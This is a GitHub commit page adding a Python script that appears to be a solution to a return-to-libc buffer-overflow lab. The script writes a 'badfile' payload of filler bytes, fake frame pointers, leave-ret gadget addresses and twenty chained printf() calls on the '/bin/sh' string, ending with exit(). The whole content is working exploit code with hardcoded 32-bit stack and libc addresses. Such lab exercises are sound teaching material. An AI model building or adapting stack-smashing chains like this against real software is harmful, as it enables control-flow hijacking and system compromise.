File tree Expand file tree Collapse file tree 1 file changed +36
-0
lines changed Expand file tree Collapse file tree 1 file changed +36
-0
lines changed Original file line number Diff line number Diff line change 1+ #!/usr/bin/python3
2+ import sys
3+
4+ def tobytes (value ):
5+ return (value ).to_bytes (4 ,byteorder = 'little' )
6+
7+ leaveret = 0x08048565 # Address of leaveret
8+ sh_addr = 0xbffffdd0 # Address of "/bin/sh"
9+ printf_addr = 0xb7e51670 # Address of printf()
10+ exit_addr = 0xb7e369d0 # Address of exit()
11+ ebp_foo = 0xbfffe4c8 # foo()'s frame pointer
12+
13+ content = bytearray (0xaa for i in range (112 ))
14+
15+ # From foo() to the first function
16+ ebp_next = ebp_foo + 0x20
17+ content += tobytes (ebp_next )
18+ content += tobytes (leaveret )
19+ content += b'A' * (0x20 - 2 * 4 )
20+
21+ # printf()
22+ for i in range (20 ):
23+ ebp_next += 0x20
24+ content += tobytes (ebp_next )
25+ content += tobytes (printf_addr )
26+ content += tobytes (leaveret )
27+ content += tobytes (sh_addr )
28+ content += b'A' * (0x20 - 4 * 4 )
29+
30+ # exit()
31+ content += tobytes (0xFFFFFFFF ) # The value is not important
32+ content += tobytes (exit_addr )
33+
34+ # Write the content to a file
35+ with open ("badfile" , "wb" ) as f :
36+ f .write (content )
You can’t perform that action at this time.
0 commit comments